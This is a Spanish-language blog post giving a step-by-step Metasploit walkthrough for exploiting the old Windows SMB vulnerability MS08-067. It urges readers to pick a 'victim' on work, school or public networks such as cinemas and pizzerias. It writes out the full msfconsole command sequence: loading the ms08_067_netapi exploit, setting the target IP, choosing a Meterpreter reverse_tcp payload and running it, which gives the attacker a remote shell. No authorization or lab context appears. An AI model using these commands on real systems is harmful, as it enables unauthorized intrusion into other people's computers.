De tarde y de mañana y a medio dia orare y clamare, y El oira mi voz



 
Intrusion mediante la explotacion de
MS08_067



 
La vulnerabilidad MS08_067 tiene ya muchos años que aparecio y se corrigio, sin embargo, muchos usuarios por no decir que 99 de cada 100 o la "mayoria" no le prestan atencion a la actualizcion del sistema operativo. Pues al ser un poco ignorantes de la importancia del caso optan por no poner manos a la obra al asunto.


La vulnerabilidad se encuentra en el servicio del servidor. Este permite que sea posible compartir recursos locales dentro de la red, ya saben unidades de disco, impresoras, etc.


Los sistemas operativos afectados:

- Windows Server 2008
- Windows Server 2003
- Windows Vista
- Windows XP
- Windows 2000



Para poder obtener un acceso como administrador al equipo tenemos que explotar la vulnerabilidad con una suite de explotis conocida como metasploit. 


Herramientas necesarias:


- Sentido Comun
- Simbolo del sistema
- Metasploit
- Paciencia mucha paciencia



 
La intrusion


 
En este articulo paso a paso describo como poner en marcha el matasploit para explotar la vulnerabilidad antes mencionada. Misma que nos dara acceso total a un equipo, es importante señalar que si al finalizar el procedimiento no se obtiene lo deseado (La intrusion) es y sera muy logico que estaran atacando un equipo que NO es vulnerable.


Como en todo proceso de hackig es necesario llevar acabo la information gathering. !De suma importancia!.. ¿Que es? ..


Information Gathering es un proceso por medio del cual se obtienen datos de un objetivo a atacar (Nuestro objetivo).


- Bloques de Red y Sub Red
- Puertos abiertos y aplicaciones que corren atravez de ellos
- Direcciones DNS
- E-mail de contacto
- Telefonos de la organizacion
- Direcciones IP's
- Versiones de sistema operativo
- Vulnerabilidades
- Otros.



 
Buscando a nuestra victima


 
Supongamos que estan en su trabajo, escuela o simplemente conectados a una red publica abierta como esas que existen en el cine, en las pizzas o en las plazas y es su mas grande deseo entrometerse en un equipo. Pues, lo primero que tenemos que hacer es buscarnos una victima.


Como los equipos no estan conectados en red si no al router para tener salida a internet lo mas comun es hacer un escaneo de puertos para ver que equipos estan "vivos", es decir, estan conectados y en funcionamiento (Ya despues les dire como hacer un escaneo de puertos sencillo, de esos que no levantan tantas sospechas).


Comenzemos apartir de saber que ustedes ya saben que equipos estan vivos en su red y ya visualizaron uno. En mi caso el escenario es el siguiente.


- IP Atacante 192.168.1.64
- IP Victima 192.168.1.68


Pues es hora de ejecutar el metasploit y una vez que cargue todo el asunto escribimos:


-
use exploit/windows/smb/ms08_067_netapi


Este comando lo que hace mas que nada es "cargar o llamar" al exploit que vamos a utilizar en nuestro caso el ms08_067. La vulnerabilidad se encuentra en el servicio SMB que como ya habia mencionado permite compartir archivos e impresoras en la red.


- msf exploit(ms08_067_netapi) > set RHOST 192.168.1.68


Este comando indica al metasploit la direccion IP de la victima, es decir, aquella computadora que nosotros creemos es vulnerable. la palabra SET indica la instruccion "Indicar" valgame la redundancia.


- msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp


Este comando carga un payload. Un payload o "Carga util" es una funcion adicional que un software malicioso hace o lleva acabo en un equipo.


- Borrado de informacion
- Sobre escritura de disco
- Recogida de datos
- Apertura de sesiones (Como es nuestro caso)


- msf exploit(ms08_067_netapi) > exploit


Este comando lo que hace es "Ejecutar el exploit" contra el equipo vulnerable.


















 



 
© 2019 De tarde y de mañana y a medio dia orare y clamare, y El oira mi voz

11806